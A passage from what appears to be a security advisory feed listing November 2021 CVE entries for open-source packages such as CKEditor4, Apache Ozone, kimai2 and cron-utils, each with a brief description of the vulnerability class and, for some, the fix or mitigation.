solidus_auth_devise provides authentication services for the Solidus webstore framework, using the Devise gem. Applications are affected when configured to use the `:null_session` or `:reset_session` CSRF protection strategies (`:null_session` is the default when no strategy is given, but `rails --new` generated skeletons use `:exception`).

Added on 2021-11-24

CVE-2021-3950

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/django-helpdesk

django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-11-24

CVE-2021-43668

NULL Pointer Dereference in go/github.com/ethereum/go-ethereum/eth

Go-Ethereum nodes crash (denial of service) after receiving a series of messages and cannot be recovered. They crash with "runtime error: invalid memory address or nil pointer dereference" and raise a SEGV signal.

Added on 2021-11-24

CVE-2021-41273, GHSA-wwgq-9jhf-qgw6

Cross-Site Request Forgery (CSRF) in packagist/pterodactyl/panel

Pterodactyl is an open-source game server management panel built with PHP 7, React, and Go. Due to improperly configured CSRF protections on two routes, a malicious user could execute a CSRF-based attack against the following endpoints: Sending a test email and Generating a node auto-deployment token. At no point would any data be exposed to the malicious user, this would simply trigger email spam to an administrative user, or generate a single auto-deployment token unexpectedly. This token is not revealed to the malicious user, it is simply created unexpectedly in the system. This has been addressed in release `1.6.6`. Users may optionally manually apply the fixes released in v1.6.6 to patch their own systems.

Added on 2021-11-24

CVE-2021-3976

Cross-Site Request Forgery (CSRF) in packagist/kevinpapst/kimai2

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-11-24

CVE-2021-3957

Cross-Site Request Forgery (CSRF) in packagist/kevinpapst/kimai2

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-11-24

CVE-2021-3963

Cross-Site Request Forgery (CSRF) in packagist/kevinpapst/kimai2

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-11-24

CVE-2021-3961

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/snipe/snipe-it

snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-11-24

CVE-2021-41275, GHSA-26xx-m4q2-xhq8

Cross-Site Request Forgery (CSRF) in gem/spree_auth_devise

spree_auth_devise is an open source library which provides authentication and authorization services for use with the Spree storefront framework by using an underlying Devise authentication framework. Applications are affected when configured to use the `:null_session` or `:reset_session` CSRF protection strategies (`:null_session` is the default when no strategy is given, but `rails --new` generated skeletons use `:exception`).

Added on 2021-11-24

CVE-2021-44144

Out-of-bounds Read in pypi/asterix_decoder

Croatia Control Asterix has a heap-based buffer over-read, with additional details to be disclosed at a later date.

Added on 2021-11-24

CVE-2021-39198, GHSA-vf7h-6246-hm43

Cross-Site Request Forgery (CSRF) in packagist/oro/crm

OroCRM is an open source Client Relationship Management (CRM) application. There are no workarounds that address this vulnerability and all users are advised to update their package.

Added on 2021-11-24

CVE-2021-41165, GHSA-7h26-63m7-qhf2

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/ckeditor4

CKEditor4 is an open source WYSIWYG HTML editor. The vulnerability allowed malformed comment HTML to be injected, bypassing content sanitization, which could result in executing JavaScript code. It affects all users of the affected CKEditor 4 versions; the problem has been recognized and patched.

Added on 2021-11-24

CVE-2021-3943

Improper Input Validation in packagist/moodle/moodle

A flaw was found in Moodle, including earlier unsupported versions. A remote code execution risk when restoring backup files was identified.

Added on 2021-11-24

CVE-2021-23433

Improperly Controlled Modification of Dynamically-Determined Object Attributes in npm/algoliasearch-helper

The package algoliasearch-helper is vulnerable to Prototype Pollution due to its use of the merge function.

Added on 2021-11-24

CVE-2021-2471

Uncontrolled Resource Consumption in maven/mysql-connector-java

Vulnerability in the MySQL Connectors product of Oracle MySQL. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of MySQL Connectors.

Added on 2021-11-24

CVE-2021-39231

Exposure of Resource to Wrong Sphere in maven/org.apache.ozone/ozone-datanode

In Apache Ozone, various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from the Datanode and Ozone Manager and to modify the Ratis replication configuration.

Added on 2021-11-23

CVE-2021-39236

Improper Authentication in maven/org.apache.ozone/ozone

In Apache Ozone, authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.

Added on 2021-11-22

CVE-2021-36372

Improper Check for Dropped Privileges in maven/org.apache.ozone/ozone

In Apache Ozone, initially generated block tokens are persisted to the metadata database and can be retrieved by authenticated users with permission to the key. Authenticated users may use them even after access is revoked.

Added on 2021-11-22

CVE-2021-39234

Incorrect Authorization in maven/org.apache.ozone/ozone

In Apache Ozone, authenticated users who know the ID of an existing block can craft specific requests allowing access to those blocks, bypassing other security checks like ACLs.

Added on 2021-11-22

CVE-2021-39235

Incorrect Permission Assignment for Critical Resource in maven/org.apache.ozone/ozone-datanode

In Apache Ozone, the Ozone Datanode does not check the access mode parameter of the block token. Authenticated users with a valid READ block token can perform any write operation on the same block.

Added on 2021-11-22

CVE-2021-39233

Incorrect Authorization in maven/org.apache.ozone/ozone-datanode

In Apache Ozone, container-related Datanode requests of the Ozone Datanode were not properly authorized and can be called by any client.

Added on 2021-11-22

CVE-2021-41532

Exposure of Resource to Wrong Sphere in maven/org.apache.ozone/ozone

In Apache Ozone, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.

Added on 2021-11-22

CVE-2021-39231

Exposure of Resource to Wrong Sphere in maven/org.apache.ozone/ozone

In Apache Ozone, various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from the Datanode and Ozone Manager and to modify the Ratis replication configuration.

Added on 2021-11-22

CVE-2021-39232

Incorrect Authorization in maven/org.apache.ozone/ozone

In Apache Ozone, certain admin-related SCM commands can be executed by any authenticated user, not just by admins.

Added on 2021-11-22

CVE-2021-41164, GHSA-pvmx-g8h5-cprj

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/ckeditor4

CKEditor4 is an open source WYSIWYG HTML editor. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code.

Added on 2021-11-22

CVE-2021-41269, GHSA-p9m8-27x8-rg87

Improper Control of Generation of Code ('Code Injection') in maven/com.cronutils/cron-utils

cron-utils is a Java library to define, parse, validate and migrate crons as well as get human-readable descriptions for them. Affected versions contain a code injection vulnerability leading to unauthenticated Remote Code Execution (RCE).

Added on 2021-11-22

CVE-2021-43996

Improper Access Control in packagist/facade/ignition

The Ignition component for Laravel has a `fix variable names` feature that can lead to incorrect access control.

Added on 2021-11-22

CVE-2021-41266, GHSA-4999-659w-mq36

Missing Authentication for Critical Function in go/github.com/minio/console

MinIO Console is a graphical user interface for the MinIO Operator. Users unable to upgrade should add `automountServiceAccountToken: false` to the operator-console deployment in Kubernetes so that no service account token gets mounted inside the pod, then disable the external identity provider authentication by unsetting the `CONSOLE_IDP_URL`, `CONSOLE_IDP_CLIENT_ID`, `CONSOLE_IDP_SECRET` and `CONSOLE_IDP_CALLBACK` environment variables and instead use the Kubernetes service account token.

Added on 2021-11-22

CVE-2021-41263, GHSA-844m-cpr9-jcmh

Exposure of Sensitive Information to an Unauthorized Actor in gem/rails_multisite

rails_multisite provides multi-db support for Rails applications. Depending on how the application makes use of signed or encrypted cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application. The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previously signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.

Added on 2021-11-22